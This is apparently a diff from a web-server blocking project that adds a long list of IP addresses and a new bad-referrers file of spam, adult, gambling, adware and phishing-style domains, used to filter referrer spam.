+91.147.93.36
+91.149.1.99
+91.151.128.225
+91.151.88.144
+91.180.79.130
+91.183.198.251
+91.189.183.213
+91.191.209.198
+91.196.164.131
+91.196.164.156
+91.196.164.176
+91.196.54.125
+91.202.233.17
+91.203.135.241
+91.203.177.71
+91.203.66.37
+91.205.128.170
+91.205.131.255
+91.205.219.185
+91.205.24.147
+91.206.26.26
+91.207.115.249
+91.207.181.124
+91.211.56.114
+91.212.166.37
+91.213.99.45
+91.214.112.165
+91.219.60.147
+91.223.169.83
+91.223.169.88
+91.224.137.138
+91.225.219.58
+91.225.44.75
+91.227.18.79
+91.232.120.102
+91.234.127.158
+91.236.168.249
+91.237.163.35
+91.237.163.36
+91.237.163.37
+91.238.181.20
+91.238.181.21
+91.238.181.22
+91.238.181.23
+91.238.181.24
+91.238.181.31
+91.238.181.32
+91.238.181.33
+91.238.181.34
+91.238.181.35
+91.238.181.71
+91.238.69.91
+91.239.19.66
+91.240.61.14
+91.241.150.246
+91.243.160.62
+91.243.50.206
+91.244.113.178
+91.244.171.40
+91.72.153.110
+91.74.30.24
+91.74.41.96
+91.74.43.17
+91.74.46.237
+91.74.98.113
+91.75.1.20
+91.77.163.86
+91.81.136.227
+91.90.121.149
+91.92.185.172
+91.92.189.18
+91.92.199.36
+91.92.240.245
+91.92.241.129
+91.92.241.15
+91.92.241.182
+91.92.241.44
+91.92.241.6
+91.92.242.163
+91.92.243.155
+91.92.244.149
+91.92.244.236
+91.92.244.48
+91.92.245.172
+91.92.245.242
+91.92.245.243
+91.92.245.245
+91.92.245.248
+91.92.245.249
+91.92.246.216
+91.92.246.231
+91.92.248.161
+91.92.249.128
+91.92.249.215
+91.92.249.54
+91.92.250.101
+91.92.250.216
+91.92.250.95
+91.92.250.99
+91.92.251.101
+91.92.251.235
+91.92.251.254
+91.92.252.27
+91.92.252.62
+91.92.253.153
+91.92.254.221
+91.92.255.189
+91.92.255.98
+92.106.201.70
+92.114.59.139
+92.118.39.119
+92.118.39.120
+92.118.39.133
+92.118.39.15
+92.118.39.17
+92.118.39.205
+92.118.39.212
+92.118.39.244
+92.118.39.32
+92.118.39.36
+92.118.39.37
+92.118.39.81
+92.137.16.76
+92.154.59.101
+92.154.95.236
+92.191.96.185
+92.191.96.210
+92.204.139.118
+92.205.104.118
+92.205.108.83
+92.205.182.254
+92.205.19.74
+92.205.21.182
+92.222.10.235
+92.222.171.6
+92.222.177.43
+92.222.180.245
+92.222.181.145
+92.222.181.205
+92.222.181.7
+92.222.86.142
+92.241.106.38
+92.246.139.107
+92.246.139.113
+92.246.84.133
+92.246.84.15
+92.249.48.202
+92.249.48.213
+92.249.48.74
+92.255.195.59
+92.255.196.185
+92.255.85.107
+92.255.85.253
+92.26.0.203
+92.27.101.99
+92.27.157.252
+92.27.247.25
+92.35.32.155
+92.42.96.51
+92.50.146.94
+92.52.165.208
+92.54.57.90
+92.55.11.149
+92.55.190.215
+92.62.243.174
+92.63.179.69
+92.63.197.210
+92.63.206.71
+92.63.206.99
+92.87.22.210
+92.99.13.96
+93.108.120.147
+93.113.111.193
+93.113.63.124
+93.113.63.8
+93.115.79.45
+93.118.106.118
+93.118.139.47
+93.118.145.143
+93.120.240.202
+93.121.170.130
+93.121.212.13
+93.123.194.205
+93.125.42.37
+93.131.139.154
+93.148.188.54
+93.157.174.208
+93.157.44.54
+93.174.93.12
+93.174.95.106
+93.177.109.110
+93.182.149.10
+93.183.131.53
+93.185.73.178
+93.190.225.213
+93.241.247.234
+93.42.100.30
+93.42.149.10
+93.58.255.46
+93.84.100.70
+93.84.86.48
+94.101.177.147
+94.102.125.123
+94.102.49.119
+94.102.49.148
+94.102.49.190
+94.102.49.193
+94.102.49.238
+94.102.51.218
+94.102.56.15
+94.102.56.29
+94.102.63.68
+94.127.212.198
+94.131.211.168
+94.136.184.78
+94.140.210.134
+94.141.120.113
+94.141.120.119
+94.141.120.147
+94.141.120.155
+94.141.120.171
+94.141.120.185
+94.141.120.187
+94.141.120.198
+94.141.120.202
+94.141.120.203
+94.141.120.207
+94.141.120.236
+94.141.120.242
+94.141.120.26
+94.141.120.42
+94.141.120.5
+94.141.120.58
+94.141.120.65
+94.141.120.77
+94.141.120.86
+94.141.120.99
+94.154.46.144
+94.156.116.123
+94.156.177.103
+94.156.177.132
+94.156.177.26
+94.156.177.33
+94.156.177.35
+94.156.177.37
+94.156.177.4
+94.156.177.41
+94.156.177.44
+94.156.177.47
+94.156.177.51
+94.156.177.58
+94.156.177.65
+94.156.177.76
+94.156.177.77
+94.156.177.79
+94.156.177.87
+94.156.177.95
+94.156.57.39
+94.156.64.113
+94.156.64.121
+94.156.64.170
+94.156.64.55
+94.156.64.75
+94.156.64.79
+94.156.65.150
+94.156.65.153
+94.156.65.25
+94.156.66.102
+94.156.66.103
+94.156.66.106
+94.156.66.15
+94.156.66.196
+94.156.66.254
+94.156.66.81
+94.156.66.82
+94.156.66.83
+94.156.66.90
+94.156.66.92
+94.156.67.105
+94.156.67.110
+94.156.68.159
+94.156.68.162
+94.156.68.237
+94.156.69.197
+94.156.69.207
+94.156.69.219
+94.156.69.222
+94.156.69.227
+94.156.71.107
+94.156.71.11
+94.156.71.121
+94.156.71.15
+94.156.71.17
+94.156.71.176
+94.156.71.18
+94.156.71.19
+94.156.71.20
+94.156.71.202
+94.156.71.226
+94.156.71.232
+94.156.71.233
+94.156.71.235
+94.156.71.239
+94.156.71.247
+94.156.71.249
+94.156.71.3
+94.156.71.37
+94.156.71.38
+94.156.71.39
+94.156.71.5
+94.156.71.64
+94.156.71.65
+94.158.57.217
+94.16.112.22
+94.16.121.226
+94.179.107.98
+94.179.133.22
+94.180.247.20
+94.181.95.145
+94.19.176.212
+94.190.83.164
+94.201.56.19
+94.201.72.113
+94.201.88.199
+94.204.100.38
+94.204.120.177
+94.204.194.75
+94.204.195.100
+94.204.238.171
+94.204.45.174
+94.204.65.31
+94.204.66.222
+94.204.76.14
+94.204.95.40
+94.205.217.67
+94.205.219.157
+94.205.82.105
+94.205.83.205
+94.206.41.18
+94.207.16.106
+94.207.16.191
+94.207.25.245
+94.228.162.3
+94.228.163.98
+94.228.165.82
+94.228.169.65
+94.23.123.1
+94.23.145.155
+94.23.219.59
+94.230.208.147
+94.249.68.50
+94.250.202.134
+94.254.0.234
+94.255.90.242
+94.33.59.31
+94.43.11.19
+94.52.209.104
+94.61.7.100
+94.72.115.107
+94.73.219.205
+94.74.121.222
+94.74.124.228
+94.74.126.94
+95.105.113.109
+95.111.233.66
+95.111.252.226
+95.111.253.31
+95.118.139.68
+95.128.43.164
+95.128.69.10
+95.130.227.131
+95.130.227.206
+95.134.127.209
+95.141.228.9
+95.142.90.214
+95.152.60.122
+95.160.28.219
+95.160.47.156
+95.161.170.86
+95.164.116.96
+95.164.32.169
+95.164.7.66
+95.165.153.0
+95.165.65.191
+95.167.225.76
+95.167.53.98
+95.173.191.84
+95.174.104.112
+95.174.124.39
+95.174.99.133
+95.181.86.2
+95.188.91.101
+95.21.51.32
+95.214.27.166
+95.214.27.168
+95.214.27.169
+95.214.27.170
+95.214.27.27
+95.214.27.29
+95.214.27.30
+95.214.27.31
+95.214.27.32
+95.214.27.38
+95.214.27.39
+95.214.27.40
+95.214.27.41
+95.214.53.64
+95.214.55.138
+95.217.189.33
+95.221.228.130
+95.223.185.114
+95.229.118.228
+95.24.3.51
+95.246.158.16
+95.247.12.29
+95.255.108.3
+95.26.129.196
+95.38.106.182
+95.38.197.204
+95.47.242.22
+95.52.11.27
+95.57.207.100
+95.58.255.251
+95.64.136.246
+95.65.99.125
+95.7.117.238
+95.71.3.190
+95.81.93.99
+95.84.217.221
+95.85.112.170
+95.85.114.218
+95.85.45.45
+95.85.47.10
+95.85.56.9
+95.87.225.236
+95.87.246.71
+95.87.248.223
+95.9.245.47
+95.90.242.212
+96.1.40.151
+96.10.144.195
+96.10.249.114
+96.126.110.181
+96.126.110.54
+96.126.127.169
+96.19.196.219
+96.235.27.111
+96.60.188.235
+96.67.59.65
+96.69.13.140
+96.73.137.118
+96.77.117.189
+96.78.175.36
+96.78.175.39
+96.78.175.41
+96.78.175.45
+96.79.249.93
+96.84.198.29
+96.85.200.220
+96.88.153.181
+97.104.82.254
+97.107.133.213
+97.107.139.11
+97.107.141.150
+97.64.23.14
+97.74.83.185
+97.74.85.237
+97.74.87.44
+97.74.95.243
+97.86.134.216
+97.91.242.161
+98.10.121.246
+98.102.148.242
+98.113.203.148
+98.116.240.38
+98.13.195.168
+98.14.144.113
+98.150.86.115
+98.17.123.48
+98.184.108.60
+98.188.163.22
+98.211.92.207
+98.23.233.65
+98.24.163.2
+98.242.210.175
+98.27.189.28
+98.28.182.226
+98.70.78.215
+98.81.168.185
+98.96.193.10
+98.96.193.11
+98.96.193.12
+98.96.193.13
+98.96.193.14
+98.96.193.4
+98.96.193.53
+99.226.129.119
+99.255.100.228
diff --git a/db/bad-referrers.txt b/db/bad-referrers.txt
new file mode 100644
index 0000000..75f087f
--- /dev/null
+++ b/db/bad-referrers.txt
@@ -0,0 +1,7105 @@
+000free.us
+007angels.com
+00author.com
+00go.com
+00it.com
+00webcams.com
+01apple.com
+03e.info
+03p.info
+08800.top
+0912701309f8ce.com
+0c47f8422d3f.com
+0daymusic.org
+0lovespells0.blogspot.com
+0n-line.tv
+1-99seo.com
+1-free-share-buttons.com
+1000n1.ru
+1001desert.com
+1001watch.com.ua
+1008.su
+100dollars-seo.com
+100searchengines.com
+101billion.com
+101flag.ru
+101lesbian.xyz
+101raccoon.ru
+108shot.com
+10bet.com
+11235813.webzdarma.cz
+11pikachu.ru
+123any.com
+123cha.com
+123kuma.com
+123locker.com
+123movies.love
+12bet.com
+12masterov.com
+12u.info
+1314dh.com
+13tabs.com
+14b.info
+1688.com
+178evakuator178.ru
+18ps.ru
+1adult.com
+1bet.com
+1flag.co.za
+1hwy.com
+1j7740kd.website
+1kdailyprofit.me
+1kinobig.ru
+1millionusd.xyz
+1pamm.ru
+1qingdao.com
+1stat.ru
+1webmaster.ml
+1xbet4you.com
+2000k.ru
+2015god.org
+2020iscoming.info
+202ch.com
+20pascals.nl
+214jaluwobapef.cf
+21h2o.com
+2345.com
+23kw.ru
+24-ak.ru
+24videos.tv
+24x7-server-support.site
+256bit.by
+2728fb936f0.com
+273-fz.ru
+28n2gl3wfyb0.ru
+2ads.co.uk
+2daytrendingnews.com
+2drittel.de
+2girls1cup-free.com
+2itech.ru
+2kata.ru
+2nt.ru
+2pxg8bcf.top
+2rich4bitches.com
+2x2fan.ru
+3-letter-domains.net
+300richmond.co.nz
+34.gs
+3dracergames.com
+3rbseyes.com
+3th.co.in
+3w24.com
+3weekdiet.com
+3xforum.ro
+404.mn
+40cg.com
+45en.ru
+4inn.ru
+4istoshop.com
+4k-player.pl
+4kepics.com
+4kpics.rocks
+4kplayer.pl
+4pp13.com
+4rent.ru
+4replicawatch.net
+4senses.co
+4ur.click
+4ureyesonly.com
+4webmasters.com
+4webmasters.org
+5-steps-to-start-business.com
+5000-cotydzien.com
+51.la
+51unlim.ru
+55wmz.ru
+57883.net
+5elementov.ru
+5forex.ru
+5i2.net
+5kstore.com
+5tey7463.weebly.com
+5u.com
+5ws.dating-app.ru
+6128786.com
+66cpwgln.space
+6hopping.com
+70casino.online
+72-news.com
+76brighton.co.uk
+777-club.ru
+7a2rnuey1tw9ar.ru
+7fon.ru
+7makemoneyonline.com
+7minuteworkout.com
+7ooo.ru
+7search.com
+7wind.ru
+7xc4n.com
+7yue.org
+7zap.com
+83net.jp
+8558l.jobs.net
+883zy.com
+888.com
+8gold.com
+8jn.dating-app.ru
+8kisses.eu
+8lufu.com
+8si.ru
+8xv8.com
+91abcw.com
+98oi.ru
+991mostfm.co.id
+999webdesign.com
+9icmzvn6.website
+9med.net
+DomainStatsBot
+a.frcls.fr
+a.pr-cy.ru
+a14download.com
+a1security.com.ua
+a96527gi.beget.tech
+aa08daf7e13b6345e09e92f771507fa5f4.com
+aa14ab57a3339c4064bd9ae6fad7495b5f.com
+aa625d84f1587749c1ab011d6f269f7d64.com
+aa81bf391151884adfa3dd677e41f94be1.com
+aa8780bb28a1de4eb5bff33c28a218a930.com
+aa8b68101d388c446389283820863176e7.com
+aa9bd78f328a6a41279d0fad0a88df1901.com
+aa9d046aab36af4ff182f097f840430d51.com
+aaa38852e886ac4af1a3cff9b47cab6272.com
+aab94f698f36684c5a852a2ef272e031bb.com
+aac500b7a15b2646968f6bd8c6305869d7.com
+aac52006ec82a24e08b665f4db2b5013f7.com
+aad1f4acb0a373420d9b0c4202d38d94fa.com
+aadroid.net
+aanapa.ru
+aarbur.com
+aaronabel.com
+aasoldes.fr
+abbanreddy.com
+abcdefh.xyz
+abcdeg.xyz
+abcguru.xyz
+abclauncher.com
+abctoppictures.net
+abiente.ru
+above.com
+abovetherivernc.com
+absolute-s.ru
+absolutelyanalog.com
+absugars.com
+abtasty.com
+abusora.com
+abwa.tk
+academia-nsk.org
+academiacsmendoza.org
+acads.net
+acc.eu.org
+accessoires-mode.in
+acgs.tk
+acheterviagrafr24.com
+acmebtn.ml
+acortarurl.es
+actices.com
+actionnooz.com
+activecampaign.dreamhosters.com
+activepr.ru
+actulite.com
+acunetix-referrer.com
+ad-words.ru
+adamoads.com
+adanih.com
+adbetclickin.pink
+adcash.com
+adclickservice.com
+adclickthru.net
+adconscious.com
+add-add.men
+addbin.men
+addblueoff.com.ua
+addray.pro
+addtoadd.men
+adelly.bg
+adexprts.com
+adf.ly
+adhome.biz
+adidas.frwebs.fr
+adimmix.com
+adinterax.com
+adktrailmap.com
+adloads.com
+adloads.net
+adman.gr
+adman.se
+admanaerofoil.com
+admatic.com.tr
+admeasures.com
+adminshop.com
+admitad.com
+adnotbad.com
+adobereader-free.ru
+adpremium.org
+adprotect.net
+adrenalin-stk.ru
+adrunnr.com
+ads-cool.pro
+ads-seo.men
+ads.gold
+ads.tremorhub.com
+adserver-e7.com
+adservme.com
+adsfresh.men
+adsland.men
+adsloads.com
+adsref.men
+adssafeprotected.com
+adtech.de
+adtech.fr
+adtech.us
+adtiger.tk
+adtology.com
+adult-shop.com.ua
+adult3dgames.com
+adultactioncam.com
+adultfriendfinder.com
+adultfullhd.com
+adultgalls.com
+adultmeetonline.info
+adultnet.in
+adultwebhosting.info
+advancedcleaner.com
+advancedmassagebysara.com
+advancedsoftwaresupport.com
+adventureparkcostarica.com
+adverster.com
+advertex.info
+advertisingtag.net
+adviceforum.info
+advocatemsk.ru
+advokat-grodno.by
+advokateg.ru
+advokateg.xyz
+adzerg.com
+adzpower.com
+aero2.ru
+aerogo.com
+affiliate-fr.com
+affordablewebsitesandmobileapps.com
+affrh2015.com
+afftrack001.com
+afmuseum.com
+afora.ru
+afslankpillen2017nl.eu
+agadelha.com.br
+agahinameh.com
+agapovdg.ru
+agardomains.com
+agecheckadult.com
+ageofclones.com
+aghanyna.com
+agreda.pluto.ro
+agroeconom.kz
+agysya.ru
+ahhjf.com
+ahmedabadwebs.com
+ahrefs.com
+ahrntal.verymes.xyz
+aibolita.com
+aihelen.net
+aimayangzhi.com
+air-edem.ru
+airlandsea.info
+airmaxshoes-2016.com
+akama.com
+akita.kz
+aksonural.ru
+aktivator-windows10.blogspot.com
+aktobe.xkaz.org
+akuhni.by
+akusherok.ru
+akvamaster.dp.ua
+alarmobninsk.ru
+albamargroup.com
+alborzan.com
+albumsuper.info
+albuteroli.com
+ald2014.org
+alekseevec.ru
+alert-fdm.xyz
+alert-fjg.xyz
+alert-hgd.xyz
+alert-jdh.xyz
+alert.scansafe.net
+alessandraleone.com
+alevinefesleri.com
+alf-img.com
+alfa-img.com
+alfa-medosmotr.ru
+alfa9.com
+alfabot.xyz
+alfapro.ru
+algarveglobal.com
+algerianembassy.co.in
+alibestsale.com
+alice.it
+alienwheel.es
+alienwheels.de
+aliexpresscashback.club
+alif-ba-ta.com
+alive-ua.com
+alkoravto.ru
+all-number.com
+all-streaming-media.com
+all4invest.info
+all4invest.ru
+all4wap.ru
+allbizne.co.ua
+allblogroll.com
+allboard.xobor.de
+allcredits.su
+alldezservice.kz
+alldownload.pw
+alldubai.biz
+allesohnegirls.net
+allfinweb.com
+allforminecraft.ru
+allknow.info
+allkrim.com
+allmarketsnewdayli.gdn
+allnews.md
+allnews24.in
+allornamenti.com
+alloysteel.ru
+allpdfmags.net
+allproblog.com
+allsilver925.co.il
+allstatesugarbowl.org
+alltheviews.com
+allwidewallpapers.com
+allwomen.info
+aloofly.com
+alot.com
+alphacarolinas.com
+alphaforum.ru
+alphahoverboards.com
+alpharma.net
+alphavisions.net
+alpinism.ru
+alt-servis.ru
+alta-realestate.com
+altamayoztourism.com
+aludecor.info
+alveris.ru
+alvtank.se
+alyeskaresort.com
+am-se.com
+am15.net
+amanda-porn.ga
+amateurgalls.com
+amateurlivechat.org
+amateurmatch.com
+amazingninja.com
+amazingpic.net
+amazon-adsystem.com
+amazon-seo-service.com
+ameblo.jp
+ameblo.top
+amehdaily.com
+amigobulls.com
+amoi.tn
+amospalla.es
+ample-awards-today.us
+ampower.me
+amt-k.ru
+amung.us
+amyfoxfitness.com
+an-donut.com
+anabolics.shop
+anaksma.info
+anal-acrobats.com
+anal-acrobats.hol.es
+analnoeporno.tv
+analytics-ads.xyz
+ananumous.ru
+anapa-inns.ru
+anaseracresar.tk
+anatomiy.com
+andpolice.com
+android-style.com
+android-systems.ru
+android-vsem.org
+android4fun.org
+androids-store.com
+angel1777.kz
+angigreene.com
+angkortours.vn
+angry-fermi-7633.arukascloud.io
+animal-drawings.com
+animal36.com
+animali.deagostinipassion.it
+animalia-life.club
+animalrank.com
+animaltoplist.com
+anime.dougasouko.com
+animebox.com.ua
+animenime.ru
+anjalika.co.in
+anlimebel.kiev.ua
+anmysite.com
+anniemation.com
+anonymizeme.pro
+anonymous-redirect.com
+anonymousfox.co
+anti-virus-removal.info
+anticrawler.org
+antons-transporte.de
+aosexkontakte.net
+aosheng-tech.com
+ap.senai.br
+apartamentwroclaw.eu
+apartment.ru
+apartmentbay.ru
+apartmentratings.com
+apccargo.com
+apelsinnik.website
+apessay.com
+api.stathat.com
+apiadanaknet-a.akamaihd.net
+apiallgeniusinfo-a.akamaihd.net
+apiappenableinfo-a.akamaihd.net
+apibatbrowsecom-a.akamaihd.net
+apibetweenlinesn-a.akamaihd.net
+apibrowsesmartne-a.akamaihd.net
+apidiamondatanet-a.akamaihd.net
+apidigidocketnet-a.akamaihd.net
+apifasterlightin-a.akamaihd.net
+apiholdingmypage-a.akamaihd.net
+apiitsthirteende-a.akamaihd.net
+apilinkswiftco-a.akamaihd.net
+apiluckyleapnet-a.akamaihd.net
+apimegabrowsebiz-a.akamaihd.net
+apimossnetinfo-a.akamaihd.net
+apimountainbikei-a.akamaihd.net
+apioasisspacenet-a.akamaihd.net
+apioutoboxnet-a.akamaihd.net
+apiportalmorecom-a.akamaihd.net
+apiqualitinknet-a.akamaihd.net
+apisecretsaucebi-a.akamaihd.net
+apishops.ru
+apispringsmartne-a.akamaihd.net
+apiwebwebgetcom-a.akamaihd.net
+apiwoodensealcom-a.akamaihd.net
+app-ready.xyz
+app5.letmacworkfaster.world
+apparel-offer.com
+appartement-stumm.at
+appearance-cool.com
+apper.de
+appfastplay.com
+appfixing.space
+appiq.mobi
+apple.com-cleaner.systems
+apple.com-webbrowsing-security.review
+apple.com-webbrowsing-security.science
+appleid-verification.com
+applicationg29.com
+applyneedy.xyz
+appmsr.org
+approved.su
+approvedlocal.co.za
+apps-analytics.net
+appsaurus.com
+appsecurityr.com
+apptester.tk
+aproposde.com
+apxeo.info
+aquarium-pro.ru
+arabgirls.adultgalls.com
+arabsexxxtube.com
+arabseyes.com
+aramaicmedia.org
+arate.ru
+arcadepages.com
+arcadeplayhouse.com
+architecturebest.com
+arclk.net
+arcteryxsale.online
+arcteryxstore.online
+ardimobileinfo.ml
+arenanews.com.ua
+arenda-avtoprokat-krasnodar.ru
+arenda-yeisk.ru
+arendakvartir.kz
+arendas.net
+arendatora.ru
+arendovalka.xyz
+arewater.com
+arius.tech
+arkartex.ru
+arkkivoltti.net
+arpelsreplica.xyz
+arquapetrarca.info
+arquivo.pt
+arraty.altervista.org
+artavenuegardenstudios.com
+artdeko.info
+artdestshop.eu
+artefakct.com
+artel116.ru
+articlesdirectoryme.info
+artparquet.ru
+artpicso.com
+aruplighting.com
+arvut.org
+as5000.com
+asacopaco.tk
+ascat.porn
+asdfg.pro
+asdfz.pro
+asia-forum.ru
+asiavirtualsolutions.com
+asiengirls.net
+asmxsatadriverin.aircus.com
+asociatia-tipografilor-transilvania.ro
+asophoto.com
+asrv-a.akamaihd.net
+asrv-a.akamoihd.net
+asrvrep-a.akamaihd.net
+asrvvv-a.akamaihd.net
+asscenihotosidea.blogspot.co.za
+asscenihotosidea.blogspot.com
+asseenontv.ru
+asseenontvonline.ru
+astana.xxxkaz.org
+astrochicks.com
+atdedinotuho.tk
+atelielembrancaqueencanta.com.br
+atlant-auto.info
+atlasvkusov.ru
+atleticpharm.org
+atley.eu.pn
+atmagroup.ru
+atmovs.com
+atofilms.com
+atout-energie-69.com
+atovh.local-finders.com
+aucoinhomes.com
+audiobangout.com
+audiofree.ru
+ausergrubhof.info
+ausmepa.org.au
+auspolice.com
+aussie-prizes.com
+australia-opening-times.com
+auto-moto-elektronika.cz
+auto-zapchasti.org
+auto.rusvile.lt
+auto4style.ru
+autoblogger24.info
+autobrennero.it
+autobudpostach.club
+autochoixspinelli.com
+autodo.info
+autogrep.ru
+autoloans.com
+autolombard-krasnodar.ru
+automatic-seo.com
+automobile-spec.com
+autonew.biz
+autoplate.info
+autorn.ru
+autoseo-traffic.com
+autotop.com.ua
+autotrends.today
+autoua.top
+autovideobroadcast.com
+autowebmarket.com.ua
+availit.weebly.com
+avek.ru
+aversis.net
+aviapanda.ru
+aviav.co
+aviav.eu
+aviav.org
+aviav.ru
+aviav.ru.com
+avirasecureserver.com
+avitocars.ru
+aviva-limoux.com
+avkzarabotok.com
+avkzarabotok.info
+avon-novosib.ru
+avon-severozapad.ru
+avon-ukraine.com
+avramstroy.ru
+avto-oligarh.ru
+avtoarenda.by
+avtochehli.by
+avtocredit-legko.ru
+avtointeres.ru
+avtolombard-krasnodar.com
+avtolombard-krasnodar.ru
+avtovolop.ru
+awaybird.ru
+awency.com
+axbocz.net
+ayakino.net
+ayanaspa.com
+ayeartoforget.com
+ayerbo.xhost.ro
+ayodhya.co
+azadnegar.com
+azartclub.org
+azartmix.com
+azartmsl.com
+azartniy-bonus.com
+azarttoto.com
+azazaporn.com
+azazu.ru
+azbaseimages.net
+azbuka-mo.ru
+azbukadiets.ru
+azbukafree.com
+azinoofficial777.ru
+azlex.uz
+azte.ch
+b-styles.xyz
+b00kmarks.com
+b2b-lounge.com
+babespcs.com
+babieca.com
+bablonow.ru
+babosas.com
+babs.com.ua
+babyfactory.fr
+babyguns.ru
+back.dog
+backgroundpictures.net
+backiee.com
+backlink4u.net
+backlinkwatch.com
+backuperwebcam.weebly.com
+bad-stars.net
+badavit.com.ua
+baditri.com
+baersaratov.ru
+bag77.ru
+bagcionderlab.com
+bagsonsale.online
+baikaleminer.com
+baixar-musicas-gratis.com
+baksman.com
+bala.getenjoyment.net
+baladur.ru
+balans.shahterworld.org
+balitouroffice.com
+balkanfarma.org
+balkanfarma.ru
+balla-boo.se
+balois.worldbreak.com
+balook.com
+baltgem.com
+bambi.ck.ua
+bamo.xsl.pt
+banan.tv
+bang-hotties.com
+bangla-chat-uk-paralud.ga
+bank.uz
+bankcrediti.ru
+banki76.ru
+bankiem.pl
+bankmib.ru
+bankofthewext.com
+banksrf.ru
+bannerads.de
+bannerbank.ru
+bannerconnect.net
+bannerpower.com
+bannerspace.com
+bannerswap.com
+bannertesting.com
+baoxaydung.com.vn
+barbourjackets.online
+bard-real.com.ua
+barnfurnituremart.com
+basedecor.ru
+bashtime.ru
+basisches-wasser.net
+batanga.net
+battle.net
+battlecarnival.su
+battleforupdating.site
+bausparen.bz.it
+bavsac.com
+bayareaaeroclub.org
+bazaronline24.ru
+bbsoldes.fr
+bbtec.net
+bcmp.org
+bdsmgalls.net
+beachdriveblog.com
+beachfix.co
+beachpics.com
+beachtoday.ru
+bear.gotcher.us
+beatifullandscape.co
+beauby.ru
+beauty-b0x.pl
+beauty-bracelet.com
+beauty-clinic.ru
+beauty-things.com
+beclean-nn.ru
+becuo.com
+bedandbreakfast.com
+bedcapdealers.com
+beetpics.pw
+begalka.xyz
+beget.tech
+belinka.com.ua
+belinvestdom.by
+belsetirehafi.tk
+belstaffstore.online
+benchmarkcommunications.co.uk
+bensbargains.net
+berdasovivan.ru
+beremenyashka.com
+berlininsl.com
+berrymall.ru
+best-businessman.ru
+best-coupon-offer.com
+best-deals-products.com
+best-games.today
+best-mam.ru
+best-seo-offer.com
+best-seo-software.xyz
+best-seo-solution.com
+best-way.men
+bestadbid.com
+bestbrainprod.win
+bestbuy.ca
+bestcalovebracelet.cn
+bestchoice.cf
+bestcoin.cc
+bestcurs.org
+bestdooz.com
+bestdraws.com
+bestempresas.es
+bestfortraders.com
+besthomemadepornsites.com
+besthoro.ru
+bestimagecoollibrary.com
+bestkfiledxd.cf
+bestmarriages.com
+bestmobilityscooterstoday.com
+bestmouthwash.club
+bestofferswalkmydogouteveryday.gq
+bestofpicture.com
+bestofupload.info
+bestplacetobuyeriacta.jw.lt
+bestpornuha.com
+bestpriceninja.com
+bestprofits-there.com
+bestserials.com
+bestsexyblog.com
+bestssaker.com
+besttorrentknifta.weebly.com
+bestwaystogetpaid.us
+bestwebsiteawards.com
+bestwebsitesawards.com
+bestwrinklecreamnow.com
+bet-prognoz.com
+bet365.com
+beta.hotkeys.com
+betonka.pro
+betshuckclean.com
+betterhdporn.com
+betteroffers.review
+betterscooter.com
+betune.onlinewebshop.net
+betwinservice.com
+beyan.host.sk
+bezcmexa.ru
+bezlimitko.xyz
+bezsporno.ru
+beztuberkuleza.ru
+bfz.biz
+bg6s0.com
+bget.ru
+bgviagrachrx.com
+bharatdefencekavach.com
+bibys.com
+bidbuy.co.kr
+bidr.trellian.com
+bif-ru.info
+big-boards.info
+big-cash.net
+bigames.online
+bigcareer.info
+bigcities.org
+biglistofwebsites.com
+bigpenisguide.com
+bigpictures.club
+biketank.ga
+bikini-image.com
+bildsuche.ru
+billiard-classic.com.ua
+bimatoprost-careprost.com
+bimatoprost-careprost.com.ua
+bimmerpost.com
+bin-brokers.com
+binaryoptionscops.info
+bingo8888.com
+bingoporno.com
+binomo.com
+binomo.kz
+bio-japan.net
+bio-market.kz
+bio-optomarket.ru
+bio.trade-jp.net
+bioca.org
+biocn.dx.am
+biographiya.com
+bioinnovate.co
+bioscorp.ru
+bird1.ru
+birzha-truda.eu
+bitcoin-ua.top
+bitcoinpile.com
+bitcoinremote.com
+bitcoins-live.ru
+biteg.xyz
+bitnote.co
+bitporno.sx
+bizcheapjerseyswholesalechina.com
+bizfly.info
+bizlist.com.de
+biznesluxe.ru
+biznesrealnost.ru
+biznesschat.net
+bizru.info
+bizzliving.com
+bjanshee.ru
+bjetjt.com
+bjgugu.net.ua
+bjorkbacken.nu
+bkgr.se
+bkns.vn
+blackbabesporn.com
+blackcurranthumidifiers.site
+blackhatworth.com
+blackle.com
+blackplanet.com
+blacktwhite.com
+blackwitchcraft.ru
+blagovest-med.ru
+blavia.00author.com
+blobar.org
+blockety.co
+blockworld.ru
+blog-hits.com
+blog.axant.it
+blog.f00kclan.de
+blog.koorg.ru
+blog.koreadaily.com
+blog.remote-computer.de
+blog.yam.com
+bloggedporn.com
+bloggen.be
+bloggerads.net
+bloggers.nl
+blogig.org
+bloglag.com
+blogos.kz
+blogporn.in
+blogqpot.com
+blogrankers.com
+blogs.rediff.com
+blogsfunky672.weebly.com
+bloke.com
+blpmovies.com
+blue-square.biz
+bluejays-jerseys.us
+bluelabelsky.com
+bluerobot.info
+bluesalt.co
+bluesman.nu
+bmsco.co
+bmw-ark.ru
+bmw.afora.ru
+bmwhighperformers.com
+bnt-team.com
+boanonihaca.tk
+board.f00d.de
+boazpower.com
+bobba.dzaba.com
+bobinoz.com
+boc.kz
+bochemit.com.ua
+bocoarchives.org
+bodybuilding-shop.biz
+boeuklad.com
+bolegapakistan.com
+boleznikogi.com
+bolezniorganov.ru
+bolitgorlo.net
+boltalko.xyz
+bombla.org
+bonanza-fortune.men
+bongacams.com
+bongiornos.info
+bonkers.name
+bonky.biz
+bonux.nextview.ru
+bonvillan.com
+bonzbuddy.com
+bonzibuddi.com
+bonzybuddy.com
+boo-arts.com
+boobsimge.com
+book-bets.com
+bookhome.info
+bookmaker-bet.com
+bookmark4you.com
+bookmark4you.com.biz
+boole.onlinewebshop.net
+boom-celebs.com
+boostmyppc.com
+bosefux.esy.es
+bosman.pluto.ro
+bouda.kvalitne.cz
+bpro1.top
+bracketsmackdown.com
+bradleylive.xyz
+brainboosting.club
+brainboostingsupplements.org
+braindaily.xyz
+brains2.biz
+brainsandeggs.blogspot.com
+braintobe.win
+brainxs.us
+brainzpod.win
+braip.com.br
+brakehawk.com
+brandbucket.com
+brandedleadgeneration.com
+brandehk.dk
+brandimensions.com
+brandov.ru
+brateg.xyz
+bravegirlsclub.com
+break-the-chains.com
+breastaugmentation.co.za
+breget74.ru
+brendbutik.ru
+brewdom.ru
+brg8.com
+brianhenry.co
+brillianty.info
+brimstonehillfortress.org
+briomotor.co
+bristolhostel.com
+bristolhotel.com
+bristolhotel.com.ua
+brk-rti.ru
+brokergid.ru
+bronzeaid-a.akamaihd.net
+brothers-smaller.ru
+browsepulse-a.akamaihd.net
+browserprotecter.com
+brus-vsem.ru
+brus.city
+bryansk.zrus.org
+bscodecs.com
+btc4u.ru
